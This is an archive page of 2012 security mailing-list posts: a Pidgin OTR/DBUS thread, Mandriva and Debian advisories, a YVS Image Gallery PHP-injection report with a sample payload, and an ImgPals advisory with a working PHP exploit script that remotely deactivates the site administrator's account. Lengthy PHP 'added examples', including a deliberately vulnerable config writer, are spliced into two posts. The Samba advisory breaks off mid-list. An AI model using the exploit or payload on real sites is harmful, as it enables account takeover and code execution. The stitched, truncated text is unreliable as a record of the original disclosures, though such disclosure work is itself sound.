Re: [Full-disclosure] pidgin OTR information leakage

2012-02-28 Thread Jeffrey Walton
On Mon, Feb 27, 2012 at 3:21 PM, Rich Pieri rati...@mit.edu wrote:
 On Feb 27, 2012, at 2:37 PM, Michele Orru wrote:
 I think you didn't understand the content of the advisory.
 If there are 10 non-root users on an Ubuntu machine, for example,
 and user 1 is using pidgin with OTR compiled with DBUS, then users 2 to 10
 can see user 1's pidgin conversation.


 This is not what the OP or CVE describe:

 plaintext. This makes it possible for attackers that have gained
 user-level access on a host, to listen in on private conversations
 associated with the victim account.

 Which I read as: if I compromise user1's account then I can snoop user1's 
 DBUS sessions.  It says nothing about me being able to snoop user2's 
 sessions.  The leading phrase about attackers gaining user-level access 
 implies that legitimate users on a system are not a relevant issue.

I tend to agree with you, and question if that is in fact true (it may
well be, my apologies in advance). DBUS is on my list of things to
probe, prod, and attack due to data sharing.

But I'd be really surprised if data was available across distinct user
sessions. Unix/Linux are usually very good at separating processes and
sessions so that data does not commingle.

Jeff


Re: [oss-security] Case YVS Image Gallery

2012-02-28 Thread Henri Salo
On Mon, Feb 27, 2012 at 09:31:52AM -0700, Kurt Seifried wrote:
 If you make a list of issues (e.g. XSS, CSRF, etc) with the code
 examples I can assign the various blocks of issues CVEs.

1. ./administration/install.php opens ../functions/db_connect.php and writes to 
the file without input validation, leading to PHP code injection through all 
variables if any contains, for example: ;} ?> <?php print("Hello World"); exit() ?>

Note that the install guide on the web says: after installation is complete, 
delete the install.php file, and install.php does not need permissions.

2. ./administration/create_album.php does not have proper input validation, 
leading to stored XSS, which can only be added by administrators, but I don't 
think of this as a limit after the other vulnerabilities. The XSS will also be 
shown to normal users (mainpage).

- Henri Salo
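The injection in item 1 and one way to close it, as an added example that is not YVS Image Gallery code: a writer that splices form values straight into PHP source text (the pattern the post describes), a writer that emits each value with var_export() so it can only ever be a string literal and that refuses to run once the file exists, and a token-level check that a generated config file contains nothing but assignments. The variable names ($db_host and friends), the file layout and the install-lock behaviour are assumptions; the sample input is constructed here and reuses the post's `?> <?php ... ?>` idea, adapted to this writer.

```php
<?php
// Added example, not the YVS Image Gallery source. Variable names, file
// layout and the "refuse to overwrite" rule are assumptions.

// Vulnerable writer: form values are concatenated into PHP source text, so
// a quote followed by "?>" ends the literal and starts attacker-chosen PHP.
function write_db_config_vulnerable(string $path, array $in): void
{
    $src = "<?php\n";
    foreach (['db_host', 'db_user', 'db_pass', 'db_name'] as $k) {
        $src .= "\$$k = '" . $in[$k] . "';\n";
    }
    $src .= "?>\n";
    file_put_contents($path, $src);
}

// Hardened writer: validate, then let var_export() produce a correctly
// escaped literal. Inside a single-quoted literal "?>" is ordinary text.
function write_db_config_safe(string $path, array $in): void
{
    if (file_exists($path)) {
        // Install lock: the post notes install.php should be deleted after
        // installation; refusing a second run removes the reinstall vector.
        throw new RuntimeException("$path already exists; refusing to overwrite");
    }
    $src = "<?php\n";
    foreach (['db_host', 'db_user', 'db_pass', 'db_name'] as $k) {
        $v = (string)($in[$k] ?? '');
        if ($v === '' || strlen($v) > 128 || preg_match('/[\x00-\x1f\x7f]/', $v)) {
            throw new InvalidArgumentException("bad value for $k");
        }
        // Host, user and database names have a narrow legitimate alphabet.
        if ($k !== 'db_pass' && !preg_match('/^[A-Za-z0-9_.:-]+$/', $v)) {
            throw new InvalidArgumentException("bad characters in $k");
        }
        $src .= "\$$k = " . var_export($v, true) . ";\n";
    }
    file_put_contents($path, $src, LOCK_EX);
}

// Whitelist check on a generated config: exactly one open tag and only
// `$name = 'literal';` statements. Anything else (a second <?php, inline
// HTML, a function call) means the file carries code, not configuration.
function config_tokens_ok(string $src): bool
{
    $allowed = [T_OPEN_TAG, T_CLOSE_TAG, T_WHITESPACE, T_VARIABLE, T_CONSTANT_ENCAPSED_STRING];
    $open = 0;
    foreach (token_get_all($src) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowed, true)) {
                return false;
            }
            if ($tok[0] === T_OPEN_TAG && ++$open > 1) {
                return false;
            }
        } elseif ($tok !== '=' && $tok !== ';') {
            return false;
        }
    }
    return $open === 1;
}

function demo(): array
{
    $tmp  = sys_get_temp_dir();
    $vuln = "$tmp/db_connect_vuln.php";
    $safe = "$tmp/db_connect_safe.php";
    @unlink($vuln);
    @unlink($safe);
    // Constructed form input: db_pass carries the post's payload idea.
    $in = [
        'db_host' => 'localhost',
        'db_user' => 'gallery',
        'db_pass' => "x'; ?> <?php print(\"Hello World\"); exit(); ?>",
        'db_name' => 'yvs',
    ];
    write_db_config_vulnerable($vuln, $in);
    write_db_config_safe($safe, $in);
    return [
        'vulnerable_file_is_config_only' => config_tokens_ok(file_get_contents($vuln)),
        'safe_file_is_config_only'       => config_tokens_ok(file_get_contents($safe)),
    ];
}

var_dump(demo());
```

In the first generated file the payload arrives as a closed literal followed by a second `<?php` block containing a print and an exit, so config_tokens_ok() rejects it; in the second the same bytes are one escaped string literal and the check passes. The same check can be run over an existing db_connect.php before deciding whether an installation was tampered with.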


Re: [Full-disclosure] pidgin OTR information leakage

2012-02-28 Thread Dimitris Glynos
On 02/27/2012 11:23 PM, devn...@vonage.com wrote:
 
 I believe that clarification is in order.

Indeed it is. The original post mentions a same-user attack
vector which is very misleading as to what the real problem here is.

And it boils down to this:

Once a process sends private info over DBUS there is no way
to control where this ends up (which apps are the qualified receivers)
or what the receivers do with it. So, if for example the user
selects not to log OTR plaintext (so that this sensitive information
doesn't touch the hard drive) another application on the other end
of DBUS might choose to do something different (and not by malicious
intent). There is no way to enforce the same security policy on the
sender and the receivers.

How this could be exploited by attackers or what forensic evidence
DBUS snooping leaves are of much less importance than the above
privacy issue.

There is a very good discussion on the pidgin ticket page:
http://developer.pidgin.im/ticket/14830

Also, I've made some updates to our post, to make it clearer
as to what this issue is about:

http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/

If there are still questions, I'll be happy to answer them.

Hope this clarifies things a bit,

Dimitris


Re: [Full-disclosure] pidgin OTR information leakage

2012-02-28 Thread Dimitris Glynos
On 02/28/2012 12:14 AM, Dimitris Glynos wrote:
 On 02/27/2012 11:23 PM, devn...@vonage.com wrote:

 I believe that clarification is in order.
 
 Indeed it is. The original post mentions a same-user attack
 vector which is very misleading as to what the real problem here is.
 
 And it boils down to this:
 
 Once a process sends private info over DBUS there is no way
 to control where this ends up (which apps are the qualified receivers)
 or what the receivers do with it.

This should be:

Once a process *broadcasts* private info over DBUS there is no way
to control where this ends up (which apps are the qualified receivers)
or what the receivers do with it.

 So, if for example the user
 selects not to log OTR plaintext (so that this sensitive information
 doesn't touch the hard drive) another application on the other end
 of DBUS might choose to do something different (and not by malicious
 intent). There is no way to enforce the same security policy on the
 sender and the receivers.
 
 How this could be exploited by attackers or what forensic evidence
 DBUS snooping leaves are of much less importance than the above
 privacy issue.
 
 There is a very good discussion on the pidgin ticket page:
 http://developer.pidgin.im/ticket/14830
 
 Also, I've made some updates to our post, to make it clearer
 as to what this issue is about:
 
 http://census-labs.com/news/2012/02/25/libpurple-otr-info-leak/
 
 If there are still questions, I'll be happy to answer them.
 
 Hope this clarifies things a bit,
 
 Dimitris



[ MDVSA-2012:023-1 ] libvpx

2012-02-28 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory   MDVSA-2012:023-1
 http://www.mandriva.com/security/
 ___

 Package : libvpx
 Date: February 28, 2012
 Affected: 2010.1, 2011.
 ___

 Problem Description:

 A vulnerability has been found and corrected in libvpx:
 
 VP8 Codec SDK (libvpx) before 1.0.0 Duclair allows remote attackers
 to cause a denial of service (application crash) via (1) unspecified
 corrupt input or (2) by starting decoding from a P-frame, which
 triggers an out-of-bounds read, related to the clamping of motion
 vectors in SPLITMV blocks (CVE-2012-0823).
 
 The updated packages have been patched to correct this issue.

 Update:

 This is a symbolic advisory correction because there was a clash with
 MDVSA-2012:023 that addressed libxml2.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0823
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 80595bcf9605087872ef9e76988c06fb  
2010.1/i586/libvpx0-0.9.7-0.2mdv2010.2.i586.rpm
 6a39a655e52324d5454df93c54803e1d  
2010.1/i586/libvpx-devel-0.9.7-0.2mdv2010.2.i586.rpm
 36669f19119055daa1c65a4341bf00ee  
2010.1/i586/libvpx-utils-0.9.7-0.2mdv2010.2.i586.rpm 
 efbc2e9f8338a146ed9bb4a8133ee3d0  
2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 7d42ba1449797b928a025d82fbbf2a65  
2010.1/x86_64/lib64vpx0-0.9.7-0.2mdv2010.2.x86_64.rpm
 05101dfd30ef938952f61705a1394705  
2010.1/x86_64/lib64vpx-devel-0.9.7-0.2mdv2010.2.x86_64.rpm
 20e10865900d2a24d58b7677098057e8  
2010.1/x86_64/libvpx-utils-0.9.7-0.2mdv2010.2.x86_64.rpm 
 efbc2e9f8338a146ed9bb4a8133ee3d0  
2010.1/SRPMS/libvpx-0.9.7-0.2mdv2010.2.src.rpm

 Mandriva Linux 2011:
 e77c03974267d8b697fce1944dc7627b  
2011/i586/libvpx0-0.9.7-0.2-mdv2011.0.i586.rpm
 e52f1469cdf005a7a8e2855a65bfde2f  
2011/i586/libvpx-devel-0.9.7-0.2-mdv2011.0.i586.rpm
 6fbe1b807480c8c86d482cef51f5cc7d  
2011/i586/libvpx-utils-0.9.7-0.2-mdv2011.0.i586.rpm 
 e274966b396ce1cb66aa4b01f2bea88e  2011/SRPMS/libvpx-0.9.7-0.2.src.rpm

 Mandriva Linux 2011/X86_64:
 81c2210c4f37421a22a877599304b5a4  
2011/x86_64/lib64vpx0-0.9.7-0.2-mdv2011.0.x86_64.rpm
 02f987fb0972c5b45a91a3d02060923f  
2011/x86_64/lib64vpx-devel-0.9.7-0.2-mdv2011.0.x86_64.rpm
 a7d46c97d8294236422b37a8359ba64d  
2011/x86_64/libvpx-utils-0.9.7-0.2-mdv2011.0.x86_64.rpm 
 e274966b396ce1cb66aa4b01f2bea88e  2011/SRPMS/libvpx-0.9.7-0.2.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFPTL06mqjQ0CJFipgRAmSwAKC3SrXDSm5poitKzRLbK3HdV0s5XwCgqOwj
GCMzTwqDabkLHPmw9/sT7lk=
=XrZF
-END PGP SIGNATURE-



ImgPals Photo Host Version 1.0 Admin Account Deactivation

2012-02-28 Thread CorryL
-=[ADVISORY---]=-

ImgPals Photo Host Version 1.0 STABLE

Author: Corrado Liotta Aka CorryL [corry...@gmail.com]
-=[---]=-


-=[+] Application: ImgPals Photo Host
-=[+] Version: 1.0 STABLE
-=[+] Vendor's URL: http://www.imgpals.com/forum/
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: Admin Account Deactivation
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611

...::[ Description ]::..

I released the ImgPals Photo Host Version 1.0 STABLE


Features Include:

* Easy Install
* Full README file included
* Full Control Panel to control your site
* User Side Features
  o Multiple JQuery Uploads
  o Create and Edit Photo Albums
  o Make Albums Public or Private
  o Describe Albums and Photos
  o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos
  o Add Friends
  o Chat with Friends
  o Update people with status wall posting
  o Manage Profile
  o Profile Avatar Uploads
  o Private Messaging
* And much more, be sure to check out the Demo


...::[ Bug ]::..

An attacker can remotely deactivate the administrator's account, so that the
administrator can no longer log in to the site.

...::[ Proof Of Concept ]::..

 if ($_GET['a'] == 'app0'){
 $sqlapprove = mysql_query("UPDATE members SET
approved = '0' WHERE id = '".$_GET['u']."'");

By requesting approve.php?u=1&a=app0, which performs no authentication or
authorization check, an attacker can deactivate the administrator account
(member id 1).

...::[ Exploit ]::..

#!/usr/bin/php -f
<?php

// Coded by Corrado Liotta For educational purpose only
// use: php exploit.php server app0 or app1
// use app0 for admin account off
// use app1 for admin account on

if ($argc < 3) {
    fwrite(STDERR, "usage: php exploit.php <server> <app0|app1>\n");
    exit(1);
}
$target = $argv[1];
$power = $argv[2];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// Unauthenticated GET to the approval handler; u=1 is the administrator's member id
curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>
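The checks the quoted handler lacks, as an added example that is not ImgPals code: the snippet above changes `approved` for whatever `u` the query string carries, on a bare GET, without looking at who is asking, and concatenates `u` straight into the SQL. The rewrite below applies the checks in the order a request should meet them (session, administrator role, POST with a CSRF token, strict parameters, parameterised query) and exercises them with the kind of request the exploit sends. The `members(id, approved, is_admin)` schema, the session keys `uid` and `csrf`, and the use of PDO over an in-memory SQLite table (so it runs stand-alone) are assumptions.

```php
<?php
// Added example, not ImgPals code. Schema, session keys and the PDO/SQLite
// backing store are assumptions made so the file runs on its own.

function handle_approve(array $session, array $post, string $method, PDO $db): string
{
    // 1. Authentication: the caller must have a logged-in session at all.
    if (empty($session['uid'])) {
        return '403 not logged in';
    }
    // 2. Authorization: only an administrator may change approval state.
    $st = $db->prepare('SELECT is_admin FROM members WHERE id = ?');
    $st->execute([(int)$session['uid']]);
    if ((int)$st->fetchColumn() !== 1) {
        return '403 not an administrator';
    }
    // 3. State changes only via POST carrying the session's CSRF token, so a
    //    link an administrator is tricked into opening cannot trigger this.
    $token = (string)($session['csrf'] ?? '');
    if ($method !== 'POST' || $token === '' || !hash_equals($token, (string)($post['csrf'] ?? ''))) {
        return '403 bad method or token';
    }
    // 4. Strict parameters: a numeric member id and an action from a fixed set.
    $uid = filter_var($post['u'] ?? '', FILTER_VALIDATE_INT);
    $map = ['app0' => 0, 'app1' => 1];
    if ($uid === false || !isset($map[$post['a'] ?? ''])) {
        return '400 bad parameters';
    }
    // 5. Parameterised query instead of string concatenation of $_GET['u'].
    $st = $db->prepare('UPDATE members SET approved = ? WHERE id = ?');
    $st->execute([$map[$post['a']], $uid]);
    return $st->rowCount() === 1 ? '200 updated' : '404 no such member';
}

function demo(): array
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, approved INTEGER, is_admin INTEGER)');
    // Constructed data: member 1 is the administrator, member 2 an ordinary user.
    $db->exec('INSERT INTO members VALUES (1, 1, 1), (2, 1, 0)');

    $admin = ['uid' => 1, 'csrf' => bin2hex(random_bytes(16))];
    $req   = ['u' => '1', 'a' => 'app0'];
    $out   = [];
    // What the advisory's exploit sends: an anonymous GET.
    $out['anonymous GET']      = handle_approve([], [], 'GET', $db);
    // A logged-in ordinary member with a valid token for their own session.
    $out['member POST']        = handle_approve(['uid' => 2, 'csrf' => 'x'], $req + ['csrf' => 'x'], 'POST', $db);
    // The administrator, but via GET (a link in a message, for instance).
    $out['admin GET']          = handle_approve($admin, [], 'GET', $db);
    // The administrator, POST, correct token.
    $out['admin POST']         = handle_approve($admin, $req + ['csrf' => $admin['csrf']], 'POST', $db);
    $out['admin approved now'] = (string)$db->query('SELECT approved FROM members WHERE id = 1')->fetchColumn();
    return $out;
}

print_r(demo());
```

Only the last request gets through; the three that precede it fail on the session, role and method/token checks respectively, which is the order in which the original handler should have refused them. Returning the status string from the function rather than echoing it keeps the decision testable on its own.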


[ MDVSA-2012:025 ] samba

2012-02-28 Thread security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2012:025
 http://www.mandriva.com/security/
 ___

 Package : samba
 Date: February 28, 2012
 Affected: Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in samba:
 
 Heap-based buffer overflow in process.c in smbd in Samba allows remote
 attackers to cause a denial of service (daemon crash) or possibly
 execute arbitrary code via a Batched (aka AndX) request that triggers
 infinite recursion (CVE-2012-0870).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0870
 ___

 Updated Packages:

 Mandriva Enterprise Server 5:
 f1c5c40a39960bf0be8b4f7b0eb07f1c  
mes5/i586/libnetapi0-3.3.12-0.8mdvmes5.2.i586.rpm
 c09851ea48666122ce67fb3bb5d863b7  
mes5/i586/libnetapi-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 574874125ee63e520110e73158fa1c53  
mes5/i586/libsmbclient0-3.3.12-0.8mdvmes5.2.i586.rpm
 ed39a5badbcb3dff984d099d995e4654  
mes5/i586/libsmbclient0-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 37f6c8edc6af9e4439fe1cfa74162fd4  
mes5/i586/libsmbclient0-static-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 e06527be75deb64802f8bfa4c266f9bc  
mes5/i586/libsmbsharemodes0-3.3.12-0.8mdvmes5.2.i586.rpm
 9926b5aa94649fe5e4563d7d30eea094  
mes5/i586/libsmbsharemodes-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 13ed1d18924705829149f27c89cff483  
mes5/i586/libtalloc1-3.3.12-0.8mdvmes5.2.i586.rpm
 0dcc0cadaff5d3e9e9b26a4aa76320b9  
mes5/i586/libtalloc-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 f66dc353d8f7cc28d9e9922bc731bd06  
mes5/i586/libtdb1-3.3.12-0.8mdvmes5.2.i586.rpm
 87689dca4f04ccc56c8b7e2958f870a5  
mes5/i586/libtdb-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 eac4493389bdd505786b2a813800ec21  
mes5/i586/libwbclient0-3.3.12-0.8mdvmes5.2.i586.rpm
 0a4d9665399a405ec33352bac8b085d7  
mes5/i586/libwbclient-devel-3.3.12-0.8mdvmes5.2.i586.rpm
 31d01f8f5ac236bdeb5da6c0b1103c26  
mes5/i586/mount-cifs-3.3.12-0.8mdvmes5.2.i586.rpm
 4d65a41c7adf287f33146cb51976c12f  
mes5/i586/nss_wins-3.3.12-0.8mdvmes5.2.i586.rpm
 95851e4895bebace6a800c21411c2c98  
mes5/i586/samba-client-3.3.12-0.8mdvmes5.2.i586.rpm
 615ae2342634aa724e233fe7c38e1021  
mes5/i586/samba-common-3.3.12-0.8mdvmes5.2.i586.rpm
 593f4559e2e7927c3d2be07c75f69fc2  
mes5/i586/samba-doc-3.3.12-0.8mdvmes5.2.i586.rpm
 082b8b10f48f87102f5f4e5734192274  
mes5/i586/samba-server-3.3.12-0.8mdvmes5.2.i586.rpm
 671a8293f5c9970eff7f41a382ce1de8  
mes5/i586/samba-swat-3.3.12-0.8mdvmes5.2.i586.rpm
 d0826b2d50dd03a8a2def0ab8217a10b  
mes5/i586/samba-winbind-3.3.12-0.8mdvmes5.2.i586.rpm 
 e63162eb725a3c786a9d6ce6e3ffa834  mes5/SRPMS/samba-3.3.12-0.8mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 08052ae7f504d3afebc2592c4563cb26  
mes5/x86_64/lib64netapi0-3.3.12-0.8mdvmes5.2.x86_64.rpm
 959b440b7a52de85774c7826c23e5a0d  
mes5/x86_64/lib64netapi-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 4fbf3c6550bbd781101b19a5f59db31f  
mes5/x86_64/lib64smbclient0-3.3.12-0.8mdvmes5.2.x86_64.rpm
 fa0e52cf4f492cb5d991ca5305f4eca7  
mes5/x86_64/lib64smbclient0-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 3aab55b5470b2dd3fe21bc22aac57881  
mes5/x86_64/lib64smbclient0-static-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 62faaa06906b9b03f73d130c30841e24  
mes5/x86_64/lib64smbsharemodes0-3.3.12-0.8mdvmes5.2.x86_64.rpm
 2989b58fbd3b45bc9f59c252c694970f  
mes5/x86_64/lib64smbsharemodes-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 7b02247f56fbae2c39148fbbdb2a9753  
mes5/x86_64/lib64talloc1-3.3.12-0.8mdvmes5.2.x86_64.rpm
 c06c34fbdf4472157ce75f438c8975fe  
mes5/x86_64/lib64talloc-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 05412945bb2a1b2be22aab619395366e  
mes5/x86_64/lib64tdb1-3.3.12-0.8mdvmes5.2.x86_64.rpm
 a5d3e798398970a92129d182766049ab  
mes5/x86_64/lib64tdb-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 fa4659a2d3591b354ed48fe4780e318a  
mes5/x86_64/lib64wbclient0-3.3.12-0.8mdvmes5.2.x86_64.rpm
 a647ebd6ed3d00f8e0cf32db8deddd89  
mes5/x86_64/lib64wbclient-devel-3.3.12-0.8mdvmes5.2.x86_64.rpm
 5075846b37b482eee78d1390284d221f  
mes5/x86_64/mount-cifs-3.3.12-0.8mdvmes5.2.x86_64.rpm
 08968a5c3682f2af4dab4433d3c4906c  
mes5/x86_64/nss_wins-3.3.12-0.8mdvmes5.2.x86_64.rpm
 1f391d0c654c0efa93a4a9b90ff8abad  
mes5/x86_64/samba-client-3.3.12-0.8mdvmes5.2.x86_64.rpm
 9d374a84dab147dd3a7e20f38032740f  
mes5/x86_64/samba-common-3.3.12-0.8mdvmes5.2.x86_64.rpm
 fbc801397a2f7b94b06397aed9e037a8  
mes5/x86_64/samba-doc-3.3.12-0.8mdvmes5.2.x86_64.rpm
 39fde58a25e8180b574cf6e5a8f7e432  
mes5/x86_64/samba-server-3.3.12-0.8mdvmes5.2.x86_64.rpm
 d9f108c12ade5b0f8905cb453cdb99dc  

[SECURITY] [DSA 2420-1] openjdk-6 security update

2012-02-28 Thread Florian Weimer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2420-1   secur...@debian.org
http://www.debian.org/security/Florian Weimer
February 28, 2012  http://www.debian.org/security/faq
- -

Package: openjdk-6
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2011-3377 CVE-2011-3563 CVE-2011-5035 CVE-2012-0497
 CVE-2012-0501 CVE-2012-0502 CVE-2012-0503 CVE-2012-0505
 CVE-2012-0506 CVE-2012-0507

Several vulnerabilities have been discovered in OpenJDK, an
implementation of the Oracle Java platform.

CVE-2011-3377
The Iced Tea browser plugin included in the openjdk-6 package
does not properly enforce the Same Origin Policy on web content
served under a domain name which has a common suffix with the
required domain name.

CVE-2011-3563
The Java Sound component did not properly check for array
boundaries.  A malicious input or an untrusted Java application
or applet could use this flaw to cause Java Virtual Machine to
crash or disclose portion of its memory.

CVE-2011-5035
The OpenJDK embedded web server did not guard against an
excessive number of a request parameters, leading to a denial
of service vulnerability involving hash collisions.

CVE-2012-0497
It was discovered that Java2D did not properly check graphics
rendering objects before passing them to the native renderer.
This could lead to JVM crash or Java sandbox bypass.

CVE-2012-0501
The ZIP central directory parser used by java.util.zip.ZipFile
entered an infinite recursion in native code when processing a
crafted ZIP file, leading to a denial of service.

CVE-2012-0502
A flaw was found in the AWT KeyboardFocusManager class that
could allow untrusted Java applets to acquire keyboard focus
and possibly steal sensitive information.

CVE-2012-0503
The java.util.TimeZone.setDefault() method lacked a security
manager invocation, allowing an untrusted Java application or
applet to set a new default time zone.

CVE-2012-0505
The Java serialization code leaked references to serialization
exceptions, possibly leaking critical objects to untrusted
code in Java applets and applications.

CVE-2012-0506
It was discovered that CORBA implementation in Java did not
properly protect repository identifiers (that can be obtained
using _ids() method) on certain Corba objects.  This could
have been used to perform modification of the data that should
have been immutable.

CVE-2012-0507
The AtomicReferenceArray class implementation did not properly
check if the array is of an expected Object[] type.  A
malicious Java application or applet could use this flaw to
cause Java Virtual Machine to crash or bypass Java sandbox
restrictions.

For the stable distribution (squeeze), these problems have been fixed in
version 6b18-1.8.13-0+squeeze1.

For the testing distribution (wheezy) and the unstable distribution
(sid), these problems have been fixed in version 6b24-1.11.1-1.

We recommend that you upgrade your openjdk-6 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJPTTmbAAoJEL97/wQC1SS+lqwH/1F5hffrk0ciMajdYvUuPgs5
tDeo+Sq6WwZqSYJFYsXDyyxtLProzR9Szi4n0O5942nUqRV6UtzxsvWPoQVm+gVF
c9waYDogwr7X6KNUdhLoWRwR0wZm5lryLPUNPx1AGJd0CstxJJ3cFX243m2F0+03
BuDU4QuwMliS5YpvEJ3JUFA4zZ3ETwa033poeOD9Pkh5Y8wfbaiYM6/0yvI/lIDC
EmszvApi8iM/Q6s5olvFgHpv+J2aiLR6IYmP8wWJLd2vvGpukoix06U/eqF0NirT
ilZaZmw1YGultG34yWP95TaF5+AOYgkm5g80SeHX2B3iL2u1cd1xklo6i2eGVBE=
=jUub
-END PGP SIGNATURE-